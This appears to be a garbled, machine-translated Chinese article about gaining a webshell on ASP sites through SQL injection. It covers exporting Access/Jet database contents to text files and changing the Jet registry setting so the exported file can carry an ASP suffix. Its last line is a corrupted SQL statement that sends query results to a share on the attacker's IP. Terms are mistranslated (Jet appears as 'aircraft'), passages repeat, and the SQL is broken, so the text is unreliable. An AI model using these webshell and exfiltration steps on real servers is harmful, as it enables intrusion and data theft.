黑客教你的方式进入WebShell的SQL注入
评论:热点:n听人说有人发现SQL注入了获取webshell。刚刚听到,细节还不清楚。
在最近的书中,这本书的一章提到了喷气式飞机的安全性,然后是微光,他找到了一种与访问共享ASP的方法。
几个月前,互联网已经传播开来。
热点 uff1a
n听人说有人发现SQL注入了获取webshell。刚刚听到,细节还不清楚。
在最近的书中,这本书的一章提到了喷气式飞机的安全性,然后是微光,他找到了一种与访问共享ASP的方法。
几个月前,几个月前,将SQL用于将数据库内容导出到文本文件(TXT、HTM、HTML等)的方法被分发了。
从管理中选择*;
在上述语句的执行,下的test.txt文件在D的产生:网络目录,这是表管理的内容,但它是不可能出口的ASP格式,可以说,不能更新,数据库或对象为只读;
事实上,控制出口为后缀的文件是存储在注册表中,具体的价值是hkey_localmachine 软件微软飞机 4 disableextension文本引擎,默认值是TXT、CSV、标签!,ASC,TMP,HTM,html,ASP;如果我们还增加了的话,呵呵,你可以出口ASP格式文件。
此方法类似于调用修改注册表的访问的shell函数,因此它不是很有用。
顺便说一下,如果我们不知道网页的路径,这样在输出文本文件中提到可以出口到我们的机器:SELECT *为{测试。在我txt }; yourip sharersquo;';';从文本。